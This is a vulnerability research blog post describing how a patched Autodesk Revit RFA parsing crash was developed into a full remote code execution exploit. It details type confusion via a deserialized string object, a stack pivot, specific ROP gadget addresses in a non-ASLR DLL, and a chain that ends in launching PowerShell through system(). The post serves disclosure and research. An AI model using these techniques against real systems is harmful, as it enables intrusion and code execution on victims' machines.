Crafting a Full Exploit RCE from a Crash in Autodesk Revit RFA File Parsing

October 08, 2025 | Simon Zuckerbraun

In April of 2025, my colleague Mat Powell was hunting for vulnerabilities in Autodesk Revit 2025. While fuzzing RFA files, he found the following crash (CVE-2025-5037 / ZDI-CAN-26922, addressed by Autodesk in July 2025):

Is this an exploitable crash? From the debugger output crash point as seen above, unclear whether anything is controllable.

At around this time, my colleague Nitesh Surana uncovered a highly impactful cloud-based supply chain vulnerability in Axis Communications Plugin for Autodesk Revit. This vulnerability made it possible for a malicious actor to force the distribution of corrupted RFA files to Axis plugin users globally, which Autodesk Revit would parse upon use of the Axis Communications plugin. Refer to the blog post here for a full discussion of his research.

Since Trend ZDI was aware of this supply-chain vulnerability, we had a strong interest in determining whether a corrupted RFA file could lead to remote code execution on clients’ machines. I set out to determine the exploitability of the crash shown above. Ultimately, I was able to demonstrate that it could be used reliably for full remote code execution. Thus, in addition to showing the vulnerability of Autodesk Revit, we proved beyond doubt the severity of the Axis plugin supply chain vulnerability.

This article will be devoted to explaining how I reached arbitrary code execution from the crash point shown above. Of particular interest is the technique I used to achieve ROP execution. See the section “Level Up”. Finally, there will be a video showing the ultimate combined effect of a supply-chain attack exploiting the Axis vulnerability and the RCE in Autodesk Revit.

General Assessment of the Root Cause

In investigating the crash, the primary tools I relied upon were IDA Pro and WinDBG with Time Travel Debugging (TTD). Also, due to the modular nature of the Revit application, by which functionality is distributed among many dozens of DLLs, I was able to rely on the presence of export symbols to aid in my understanding. In the paragraphs below I will summarize my findings.

Despite Revit being an extremely heavy application, I was gratified to find that TTD easily captured a full trace of the process when loading the sample RFA. When using TTD in this way, I recommend disabling page heap. Page heap adds a great deal of memory bloat, with little offsetting benefit: when TTD is in use, time travel can be used to determine heap allocation and heap free stacks when necessary.

Tracing tainted data backwards from the crash point, it soon became evident from symbols that a deserializer was involved. The tainted value seen at the crash point was written by a constructor:

This code constructs an object of size 0x10 and initializes it with the first 8 bytes set to 0xffffffffffffffff and the second 8 bytes set to 0. Stepping out backwards in time travel reveals that the constructor sub_1810FDC70 was called from a method named Utility!ARuntimeClass::createObject.

Further tracing revealed that the method Utility!ArchiveClassMaps::loadClass is responsible for reading the type from the input file. In the input file, the type is identified by a 16-bit integer. I noticed that loadClass passes this index value as a2 to the following function:

This proved to be a sort of “Rosetta Stone” for all the numbered types known to the deserializer. It returns a pointer to a PersistentClass structure describing the serializable type indicated by the index a2. The PersistentClass structures for the first 0xb types are found sequentially at the static address unk_180F80FC0, while pointers to the rest are found in the array a1. The size of that array can be seen by examining the bounds check performed in Utility!ArchiveClassMaps::loadClass.

A bit more reversing revealed that offset 0x8 of PersistentClass held a pointer to the corresponding ARuntimeClass, and that offset 0x0 of ARuntimeClass held a pointer to the type name. Armed with this information, I wrote a WinDBG one-liner (okay, two-liner) to dump the names of all types available to the deserializer:

This is intended to be run in WinDBG at the start of sub_1801A4760, so that the array pointera1 is available in @rcx.

The output is quite lengthy, as there is a total of 4,611 types. Abbreviated output is as follows:

Within the list of available types, one finds mostly high-level C++ classes such as ADocument supporting application logic, but also various simple data types such as integers or std::pair types where the first pair member is a simple numeric type. The class index that led to the crashing object is 0xc4, corresponding to the type:

          std::pair< ElementId, ElementIdSetWrapperClass >

We can now understand the code of the constructor sub_1810FDC70described above. It is the default constructor for a pair, where the first element of the pair is of the numeric type ElementId and the second element is a pointer (I assume) to an instance of type ElementIdSetWrapperClass. The constructor initializes the pair’s first element to an ElementId of -1, and it initializes the pair’s second element to nullptr.

Furthermore, now we can make an educated guess as to the root cause of the vulnerability. The application deserializes objects from the input file. Its expectation is that those objects will be instances of the high-level classes, each of which has a vtable pointer at offset 0x0, and where the first entry in the vtable is the destructor. However, the deserializer is also capable of deserializing simple types that do not have a vtable. In our case, the object deserialized was a std::pair< ElementId, ElementIdSetWrapperClass >, and the value at offset 0x0 was not a vtable pointer but rather was -1 (=0xffffffffffffffff). When the application attempted to invoke the object’s destructor, it crashed upon dereferencing that value. What we have, then, is a type confusion vulnerability.

Exploiting the type confusion involves choosing an appropriate object to be deserialized, so that we can control program execution when the application attempts to invoke the destructor via the vtable pointer. First, however, we will need to learn how to understand the format of the input file so that we can manipulate its contents. This became a significant subtask in the exploitation challenge.

Exploring the Autodesk RFA Compound Document Format

From a visual inspection of the RFA file in a hex editor, I surmised that the overall format was an OLE Compound File.

An OLE compound file acts as a miniature filesystem that lives within a file. It contains a structure of directories (known as “storages”), and within the storages there can reside data files (known as “streams”).

By painstaking tracing of tainted data using WinDBG, I was able to determine that the serialized data comes from the stream Global\Latest – that is, from a stream named Latest located within a storage named Global, which itself is located at the root of the RFA compound file. However, there was a further complication. Global\Latest does not contain the literal bytes that will be presented to the deserializer. Rather, I found that the contents of Global\Latest is first processed by a gzip-type decompression routine, which I was able to identify by the export symbols. The un-gzipped data is what is fed to the deserializer, and has the bytes we are interested in, such as the all-important class index discussed above.

To proceed with experimenting on the file, I needed the following two items:

  1. A method of editing an OLE compound file, so I could modify the contents of the Global\Latest stream.
  2. A way to gunzip the data from the Global\Latest stream, and to gzip it again after modification, using compression compatible with the Revit software.

Presenting CompoundFileTool

To facilitate my research, I wanted a tool that would allow me to easily examine the contents of an OLE compound file and to create new OLE compound files with arbitrary contents. I was not satisfied with the tools I found by searching online and decided to create my own. Together with the publication of this article, we are opening this tool to the community.

Although the OLE compound file format is intended to be a live, editable filesystem, it is not always most convenient to address it in that way. It could also be treated as simply another archive format. The way my tool allows examination of an OLE compound file is by expanding it out into the normal filesystem. It can expand an OLE compound file into a corresponding structure of folders and files on disk. It can also perform the inverse operation to create a new OLE compound file.

You can find the source code here. I hope you find it useful to incorporate it in your fuzzing toolchain whenever you do research on software that consumes compound files.

Decoding Revit’s Gzip Format

The gzip compression used by Revit caused me some confusion for a while. The stream contains a brief header, followed by gzipped data. After the gzipped data, though, I found that there was some sort of padding section consisting of zeroes, and finally another section of high-entropy data.

At first, I did not understand the significance of this final section, so I attempted to ignore it. I mutated an RFA by replacing the gzipped data section with my own gzipped data, keeping the padding and the final data section a constant. Revit rejected this modified file as corrupt.

Moreover, I began noticing worrisome discrepancies. I ran the gzipped data from the Global\Latest stream through a standard gunzip utility and compared it with what was presented to the deserializer, as seen inside the debugger. The two versions were a close match, yet not exact.

After puzzling over this for a while, I discovered that the final section consisted of error correcting codes. Public symbols and diagnostic log text strings found in Utility.dll assisted me in reaching this understanding.

When Revit loads a tampered file, for example, a file that was altered by a fuzzer or by manual insertion of crafted data, there are three possible outcomes. If the damage is minor, the data may be successfully recovered. In that case, the changes made by the fuzzer will be reverted entirely. With somewhat more damage, the error correcting codes will do an imperfect job of restoring the original data. In the case of extensive damage, such as a case in which the gzipped data was replaced by entirely different data, Revit determines from the mismatched error correcting codes that the file is corrupt beyond recovery.

Consequently, to properly control the bytes that will be presented to the deserializer, it was crucial to have the ability to produce a correct error correcting code trailer for the stream. Similarly, to be able to take an existing fuzzed RFA file and extract from it an accurate copy of what the deserializer sees, I needed to mimic Revit’s behavior when it performs error correction. To perform these tasks, I created one additional tool for my chain. I accomplished this by copying a minimal subset of low-level DLLs and configuration files from a Revit install and writing a wrapper in C++ to call the appropriate methods. This took care of the gzip/gunzip as well as the error correction tasks in a single step.

Exploiting the Type Confusion

With those tools in my arsenal, I finally was able to rewrite RFA files at will.

As explained above, the original crash occurred due to deserialization of a type with index 0xc4, which is std::pair< ElementId, ElementIdSetWrapperClass >. I began to ponder which type from the list of available types would give me the best advantage for arbitrary code execution.

Recall that the type confusion bug results in a pointer value being read from offset 0x0 of the deserialized object. The software assumes that this is a vtable pointer, and it proceeds to call the first function pointer in the vtable, which is supposed to be the destructor for the object.

Thus, for successful exploitation, we want to choose an object that has a controllable value at offset 0x0, which will be used as a vtable pointer.

After experimenting for a while with the deserializer, I had an epiphany – an absolutely perfect candidate exists. That type is AString, with class index 0x1f.

Why AString? AString is perfect for our needs. Its memory layout is this:

The data at offset 0x0 within an AString instance is guaranteed to be a valid pointer, avoiding a crash. Furthermore, to what does it point? To a buffer containing attacker-controlled data, as read by the deserializer from the input file! Analysis of the AString deserialization code revealed that it reads string data from the input file in length-prefixed format, not in null-terminated format. Consequently, the contents of the string buffer is entirely unrestricted; we can even include null bytes with impunity. For the attacker, this is pure gold. We’re now ready to start turning the type confusion into a remote code execution exploit using ROP.

Development of the ROP Chain

Before we begin ROP exploitation, we’ll need some ASLR defeat. Examining the modules loaded into the Revit process, I found that there was one that did not support ASLR: RWUXThemeSU2015.dll (SHA256 aab0a6ae39b7f503aa0a77d4c85b8603be11982ad5207dddfb0e2e154a411bf2). One module is all it takes. The size of the .text segment of this module is 72 KB, which is large enough to provide a diverse assortment of ROP gadgets.

RWUXThemeSU2015.dll imports both LoadLibraryW and GetProcAddress. By calling these two functions, we can obtain a pointer to an arbitrary export from an arbitrary DLL in the process without the need for any additional hardcoding of offsets that could introduce fragility. My plan was to retrieve the address of ucrtbase!system and to call that function to obtain arbitrary code execution.

Before I could begin assembling a ROP chain, though, there was one major technical hurdle. In the most straightforward ROP scenario, the attacker starts with a stack smash, giving the attacker the opportunity to write at least the beginnings of a ROP chain to the stack. In that situation, the first gadget pointer of the ROP chain overwrites a return address on the stack, and successive gadget pointers occupy successively higher stack locations. Once the target process performs a ret, instead of fetching a legitimate return address, it fetches the address of the first ROP gadget and transfers control there. ROP execution commences at that point.

Our situation is different. We have no stack smash, so there is no opportunity to write any part of a ROP chain to the stack. Instead, we must do it the other way around; we must modify rsp to point to our controlled memory. This is known as a “stack pivot”.

We have a chicken-and-egg problem, though. To launch a ROP chain, we must modify rsp. But, to modify rsp, we need at least some minimal ability to execute code, which means we need to already be running ROP.

Let’s use IDA to look at the crash site, highlighted in yellow:

Figure 1

Note that rbx is a pointer into an array of objects being destructed, one of which is our AString. The code fetches [rbx] into rcx. At that point, rcx is a pointer to our AString. Next it fetches [rcx] into rax, so rax points to our controlled AString bytes. Finally, it performs call qword ptr [rax], allowing us to perform a call to any address we would like. Essentially, what we have here is the power to execute exactly one ROP gadget, but no more, because the stack is not yet pivoted. You have been granted one wish. Choose wisely.

Recalling that rax points to our controlled AString bytes, what we most want is to move rax into rsp. An ideal gadget would look something like this:

Does any such gadget exist? Regrettably, not. This isn’t surprising, though. Restoring rsp from rax isn’t an idiom that one would expect a compiler to emit. Furthermore, the instruction mov rsp, rax requires 3 opcode bytes (48 8B E0), so the probability of finding this byte sequence purely by chance within the .text segment (e.g., as misaligned bytes of other instructions) is quite low.

Sequences such as push rax; pop rsp or lea rsp, [rax+…] would also be usable, if they could be found.

As a fascinating digression, things are somewhat easier if the address in rax is effectively a 32-bit address, meaning that the upper 32 bits of rax are all zeros. I found this to be the case on Windows 10, where the heap buffer containing AString data tends to be in the 32-bit range 0x00000000- 0xffffffff. In that case, for a stack pivot instruction, instead of mov rsp, rax, we could get away with mov esp, eax. While still not idiomatic, this does have the major advantage that it requires only 2 opcode bytes instead of 3. Perhaps we could find these two bytes by chance (8B E0).

Monster Gadget Hunting

I was unable to find a usable mov esp, eax gadget just by running an off-the-shelf gadget-finding tool (ROPgadget). ROPgadget and similar tools work by scanning the target module and cataloging short runs of instructions ending with a control transfer instruction – usually a ret, but sometimes a jmp or even certain calls. Under favorable circumstances, such an automated tool will turn up a wide enough variety of gadgets to allow you to assemble a ROP chain. Here, though, my needs were a bit different. Rather than a sufficiently varied assortment of gadgets, what I needed was one very specific kind of gadget, and I needed it desperately. It was time to play dirtier.

I loaded RWUXThemeSU2015.dll into a hex editor and looked for any occurrence of 8B E0 (mov esp, eax). This offered the possibility of getting some occurrences that ROPgadget missed because they are not found within short sequences ending with a control transfer instruction. I found 12 matches in all and started examining them manually. One of them looked like this. The instruction 8B E0 (mov esp, eax) is obtained by starting execution with the second byte of the highlighted instruction, which is at address 0000000180003a36:

Figure 2

There is quite a long distance from the first instruction into the final ret, which certainly helps explain why ROPgadget didn’t include this in the ROP gadget catalog it offered me. This gadget, if you can even call it that, is a monster! Could it be useful all the same? I saw several important things right away:

• The function has no looping.
• It also has no exception throws, aborts, or other paths that could lead to process termination.
• There are numerous calls, as seen above. However, they are all calls to imported functions from GDI32.dll. In case of error conditions (which are highly likely, considering how badly we’re abusing the code), GDI32 functions are likely to merely return with an error code, and not cause any critical stop (though, see my note below regarding stack alignment).
• Since there are no stack-based buffers, the compiler has not emitted a stack cookie check at the end of the function.
• Though it’s only typical in 64-bit code, there is no epilog that restores rsp from rbp. Any modifications made to rsp are “sticky”. They will persist to the end of the function and beyond.

In other words, it looks like we might be able to call 0000000180003a36 to get our mov esp, eax stack pivot, and let the rest of this somewhat large function run its course. The ret at the end will then launch into our ROP chain, because rsp has already been pivoted to our controlled memory. Magically, this worked! The monster gadget shown above executed, start to finish, without harming the process, netting me just the required stack pivot. This solved my problem, on Windows 10 at least, where, as noted above, the heap address in rax tends to be reliably in the range ffffffff and lower.

In one respect I was incredibly lucky here. Since the initial value of eax lacked 16-byte alignment (reliably so, it turns out), when transferring this value into rsp and then making numerous GDI calls, those calls could easily have resulted in processor exceptions that would have terminated the process. It was my good fortune that, throughout all those GDI calls, no processor instructions requiring correct 16-byte stack alignment were encountered.

Level Up: A 64-bit Stack Pivot for Windows 11

The exercise above yielded an acceptable stack pivot, but only on Windows 10. On Windows 11, rax will be above ffffffff, so a true 64-bit move is required. I tried more monster gadget hunting, but to no avail. In addition to the techniques mentioned above, I used wildcard searches in the hex editor, for example, to look for a push rax followed soon by pop rsp. Nothing was working.

I was at a dead end and it was time to take a different approach. Mulling my options, and necessity being the mother of invention, my mind began to turn to something I’d only dimly appreciated earlier. Refer again to the flow graph of Figure 1. rbx is the pointer into the array of objects being destructed; every time around the loop, rbx points to the next array element. The code reads the array element into rcx, so rcx is a pointer to the object to be destructed. Every time around the loop, it fetches a new vtable pointer into rax and then calls [rax], which is, according to intention, the corresponding destructor function.

We can use this loop as a weird machine.

That’s right – besides ROP, we have a second weird machine at our disposal: the loop at 0x1802851C0 itself! Within the serialized document, we can specify multiple AString objects. Each time around the loop, when it executes the call qword ptr [rax] instruction, it effectively runs a single gadget of our choosing. Theoretically, perhaps, we don’t even need ROP! We can just specify many AString objects, and for each one, we get to execute a single gadget.

Now, this wouldn’t be the most flexible approach, because we would need to ensure that none of our gadgets disturb registers that the loop requires, especially rbx and to a lesser extent rdi. Worse, we would have to tolerate all register modifications made by the loop. However, we don’t need to use this weird machine to obtain arbitrary code execution. All we need is to use it to get a stack pivot. Then, upon the final loop iteration, we can launch conventional ROP.

Once my mind dared to appreciate the potential power of this new weird machine, the solution to my problem became easy. My idea was to use the loop machine to execute multiple gadgets, successively moving the value from the (original) rax to different locations, until I could finally move it to rsp. Now, if you want a value to end up in rsp, what finer register to move it to first than rbp. Can we move directly from rax to rbp? Indeed, we can!

           0000000180009246 : push rax ; pop rbp ; ret

This is the gadget we will execute the first time around the loop. The data of the first AString will begin with a pointer to this gadget. (Side note: The pop rbp; ret; part of this gadget was emitted by the compiler intentionally. The push rax part emerges from a misaligned reading of the instruction that precedes pop rbp.)

Next, we need a gadget that moves rbp into rsp. That also was easy to locate:

          0000000180001109 : leave ; or eax, ecx ; ret

leave is equivalent to mov rsp, rbp ; pop rbp, and, being a one-byte opcode, leave gadgets are relatively easy to find. This completes the transfer of the (original) rax value into rsp. Control never returns to the loop. Instead, the ret instruction of the leave gadget transfers control to the conventional ROP chain. The ROP chain is located within the first AString, immediately after the pointer to the first loop gadget. This is because the rax value transferred to rbp was the rax value associated with the first AString, not the second AString. In summary, I used a somewhat constrained, loop-based weird machine to execute a stack pivot, allowing me to continue execution with a conventional, full-fledged ROP weird machine. And right there is one of the most beautiful things I’ve ever created.

Adventures in Windows x64 ROP

The final major subtask in crafting this exploit was to compose the ROP chain itself.

ROP tends to be considerably more difficult on 64-bit Windows than on 32-bit Windows – even here, where CET is not active – and seems to be somewhat more difficult even than ROP on 64-bit Linux.

Whereas on 32-bit Windows, all function arguments are passed via the stack, on 64-bit Windows the first four arguments are passed via registers, namely rcx, rdx, r8, and r9. Before calling any API, one must utilize gadgets to load the appropriate registers. Moreover, all four of these registers are caller-saved, also known as “volatile” registers, meaning that callees are not responsible for restoring them before returning. Consequently, on Windows, compiled functions rarely end with sequences of instructions that are useful for loading those registers. For example, we will need a gadget to load an argument into rdx, but we won’t find any functions that end with pop rdx; ret, because functions aren’t responsible for restoring rdx before returning.

I have not studied this in depth, but matters seem to be a bit easier on Linux in this regard. Though the situation on Linux seems outwardly similar, in that function arguments are passed via volatile registers (which on Linux are rdi, rsi…), nevertheless, on Linux, the compiler will at times emit sequences usable for loading those registers (for example, pop rsi; ret). This seems to be a peculiarity of the gcc toolchain typically used on Linux.

The difficulty of ROP on 64-bit Windows may account for the relative lack of examples found online. For this reason, I am going to go into some detail on how I constructed my 64-bit Windows ROP chain. For starters: I planned to place some literal strings within the ROP chain to pass as arguments, for example, the command string to pass to ucrtbase!system. To be able to pass a literal string on the ROP stack as an argument, I needed a gadget that would move a stack address (rsp plus an offset) into another register I could work with, and eventually into rcx. Furthermore, as we will see, the ability to obtain a stack address is a generally useful primitive. I found this gadget:

          0x0000000180004c29 : lea rcx, [rsp + 0x20] ; call rax

This is perfect for retrieving a stack address into rcx. The only small trouble is that this gadget does not end with ret. I needed a way to properly resume ROP execution after this gadget. I went with this solution:

This looks like a 3-gadget chain, but it’s a bit more subtle than that. The first gadget pops a certain address into rax, and that address happens to be the address of that very same gadget: pop rax; ret. Now, since the second gadget has already been popped, the next gadget to execute is the third one: lea rcx, [rsp + 0x20] ; call rax. That gadget moves the desired stack address into rcx, then continues by calling rax. To where does this transfer control? To the second pop rax ; ret gadget – because that is what we’ve placed in rax. This pop rax takes the return address that has just been pushed by call rax and pops it back off the stack, moving it into rax but otherwise safely discarding it. Finally, ret continues ROP execution in the normal fashion, starting with the next gadget in stack order following the lea gadget. Keep in mind this technique for cancelling an undesirable return address on the stack, as we will use it again later on.

Genetically Modified Gadgets

As mentioned above, a particular difficulty with ROP on 64-bit Windows arises from the need to load function arguments into registers. Arguments are passed via volatile registers such as rdx, but, since these registers are volatile and are not restored at the conclusion of functions, typically there is a lack of gadgets like pop rdx ; ret. This can make loading arguments quite a tough challenge, because the required gadgets may not exist.

In the section above regarding what I call “monster gadgets”, I discussed how I used a hex editor to search more deeply for opcode sequences that could possibly be useful and then used a disassembler to analyze whether those sequences lead to something that could be used as a gadget, however unconventionally. In this instance, though, I took it one step further and crafted a gadget that didn’t exist. Wait, what? Isn’t the whole point of ROP that you don’t yet have the ability to write to executable memory, so you must rely exclusively on existing sequences of opcode bytes?

Well, that is true – almost true. Let me show you what I found, and how in this instance I was able to create a gadget that wasn’t there at the outset.

Consider the following code, found at 0x00000001800040f9:

Figure 3

Here we have some code that loads rdx, a volatile register we need to load. It loads it from rsi, which is a register we can load easily: Since rsi is callee-saved, gadgets of the form pop rsi ; ret are abundant. Of course, the trouble is that the most important element is missing: After it loads rdx, instead of returning to the ROP chain, the code calls some other function, RWOpenThemeData. Where does that lead?

Figure 4

RWOpenThemeData, it turns out, is a wrapper around a call to a function pointer stored at 18001EE38. As part of DllMain initialization, the module populates this function pointer with the address of UXTHEME! OpenThemeData, obtained using a call to GetProcAddress. Unsurprisingly, after initialization, the module leaves the page containing the function pointer in a PAGE_READWRITE state. All told, nothing prevents our ROP chain from overwriting the function pointer at 18001EE38, radically altering the control flow of the code in Figure 3. What should we choose to write into 18001EE38? How about this, our old standby:

          0x0000000180008e5f : pop rax ; ret

After the jmp rax of Figure 4 jumps to 0x0000000180008e5f, the pop rax will safely consume the return address that had been pushed onto the stack by the call in Figure 3, and execution will continue with ret. The net effect is that we’ve turned the code in Figure 3 into this gadget:

          0x00000001800040f9 : mov rdx, rsi ; mov rcx, rdi ; /* stomp rax */; ret

Voilà! Even though, to start with, the module didn’t seem to contain a gadget for loading rdx, I was able to create one through “genetic modification” by altering a function pointer.

I Told You Loading Registers Was Hard

After considering numerous permutations, I found the following overall plan to be workable:

  1. Load the address of the stack-based wide string ucrtbase.dll into rcx and call the LoadLibraryW import of RWUXThemeSU2015.dll.
  2. Move the result of LoadLibraryW from rax into more durable storage. I found rbx to be a good choice.
  3. Using a write-what-where primitive, which is easily crafted, write the narrow string system into a static writable memory location, and then pop (load) its address into rsi.
  4. Invoke the genetically modified gadget at 0x00000001800040f9, described earlier, to move rsi into rdx. This sets up the second parameter for GetProcAddress.
  5. Move the module address from rbx into rcx. How to accomplish this is the only major challenge we haven’t yet discussed.
  6. The proper arguments for GetProcAddress are now in rcx and rdx. Invoke the GetProcAddress import of RWUXThemeSU2015.dll. The result is in rax.
  7. Load the address of the stack-based command line string into rcx and call ucrtbase!system via the function pointer in rax.

As noted in step 5 above, there is still one hole in the plan. We need to find a way to move rbx into rcx, and to do so without disturbing the data in rdx we worked so hard to load. Since rcx is a volatile register, this is challenging to accomplish, though less so than loading rdx was. The solution I found was rather convoluted but at least did not involve any genetic modification:

As you can see, my solution made use of the same stack address retrieval primitive that I discussed earlier, plus a new sequence of four gadgets.

After setting up rcx with a stack address, I invoke the gadget 0x0000000180006a25 to move rbx into rax as a first step. Next, I use the gadget 0x0000000180011dc4, which stores rax into a location just a bit further up on the stack. (Note that this gadget also contains an unwanted xchg. This writes to the ROP stack, but I just barely escape damage because the corrupted gadget address happens to be the one most recently read, which is to say, the address of this very gadget that is currently executing! Since the address has already been read, corrupting it has no effect.) Next, I adjust the stack pointer upward by 8 bytes using a gadget consisting of a single ret, and finally I execute a pop rcx; ret gadget to load rcx from the data that had been stored to the stack. With that, at long last, the parameters are all prepared for the call to GetProcAddress.

I finished the ROP chain as follows:
• I called GetProcAddress
• I moved the result of GetProcAddress from rax into rbx, because rax won’t be preserved by the following gadget
• I used my stack address primitive one final time to load the address of a command string into rcx
• I called ucrtbase!system using the gadget jmp rbx

For the command string I used powershell.exe with the -Command switch, which provides plenty of flexibility for arbitrary code execution. As a final note, ucrtbase!system does not return until the spawned shell process exits. So, if desired, the spawned process could take this opportunity to alter the memory of the Revit process and fix up all the damage, allowing the Revit process to continue without a crash.

I’m releasing my full notes on the ROP chain here.

Miscellaneous Notes and Lessons Learned

Here I would just like to include a few items regarding ROP on 64-bit Windows that did not fit logically into my exposition above but nonetheless may be useful to the reader.

  1. When calling any function, keep in mind that the function may need a significant amount of stack space to execute correctly. If you pass a literal on the stack, the function’s execution could easily overwrite the literal, resulting in improper execution. Accordingly, immediately before making the call, execute a sequence of gadgets that advance the stack pointer sufficiently to avoid a conflict. You will have to determine the required amount experimentally.
  2. Similarly, if you have performed a stack pivot such as the one described in this article, rsp will likely be pointing within a heap block. If you do not advance the stack pointer sufficiently before you make a call, stack growth during the call may corrupt heap memory below the current block. Then, heap routines such as HeapAlloc and HeapFree, executing on the current thread or any other thread, may detect the corruption and abruptly terminate the process before your exploit is complete. As above, the solution is to advance the stack pointer sufficiently prior to making a call.
  3. In the Windows x64 calling convention, callees are entitled to use the 0x20-byte region just above the return address on the stack as a scratch area (“shadow space”). After the return from a function, therefore, you have no guarantee of the integrity of those next 0x20 bytes of the stack. To compensate for this, whenever you call a function from ROP, the very next gadget must immediately advance the stack pointer past this possibly corrupted region.
  4. Stack alignment: In the Windows x64 calling convention, rsp is 8-byte aligned at all times; however, the rules for 16-byte alignment are more subtle. Before the first instruction of every function, rsp MUST NOT be 16-byte aligned. Another way to say this is that, before every call instruction, rsp MUST be 16-byte aligned; the call will decrement rsp by 8 and store the return address at the new rsp, so that the first instruction of the callee will execute with a 16-byte non-aligned rsp as expected. When calling functions (or significant portions thereof) from ROP, stack alignment must be considered. Before executing a call to the start of a function, ensure that rsp is 16-byte aligned. In contrast, before executing a jmp to the first instruction of a function, ensure that rsp is not 16-byte aligned. If you use ROP to perform a call or jmp to an instruction somewhere in the middle of a function, you may need to consider stack alignment and bring rsp into 16-byte alignment or 16-byte non-alignment as expected by the code you are calling; apart from prolog and epilog code, most compiled code expects 16-byte aligned rsp. (For the vast majority of typical short gadgets, though, stack alignment is of no consequence.) Changing from 16-byte aligned to 16-byte unaligned rsp or vice-versa within ROP is as simple as executing a single ret gadget. However, a more advanced solution would be needed if, at the start, you do not know the state of rsp alignment with certainty.

Combined Demo: Axis Supply Chain Vulnerabilities + Autodesk Revit RCE

Please refer to this article  by my colleague Nitesh Surana regarding the cloud vulnerabilities he discovered in the Axis Communications Plugin for Autodesk (ZDI-24-1181, ZDI-24-1328, ZDI-24-1329, and ZDI-25-858). Had an attacker taken advantage of those cloud misconfigurations, they could have replaced RFA files in  cloud storage accounts belonging to Axis. Those RFA files would then have been served to Revit users who happen to use the Axis plugin, worldwide, whenever users added Axis products to their models in Autodesk Revit. In this way the attacker would achieve “one-click” remote code execution at scale. The following video simulates the consequences of a supply chain attack. The only simulated part is that a crafted RFA file is introduced artificially, by means of a Fiddler proxy, into the network traffic between Axis cloud storage and the plugin. Once the RFA file is delivered, the Revit application parses it automatically, and the video shows actual execution of the ROP exploit.the video shows actual execution of the ROP exploit.

Conclusion

In this article I have provided you with an overview of how I started with an Autodesk Revit file parsing crash of highly uncertain potential, and turned it into a code execution exploit that is fully reliable even on the latest Windows x64 platform. This RCE is unusually impactful due to the Axis cloud misconfiguration that could have resulted in automatic exploitation during normal usage of the affected products. I hope you have found the techniques discussed here informative and beneficial to your own research.

I would like to thank my colleagues Mat Powell and Nitesh Surana for their contributions to this research. Hopefully, we’ll have more tools and techniques to release in the future. Until then, follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.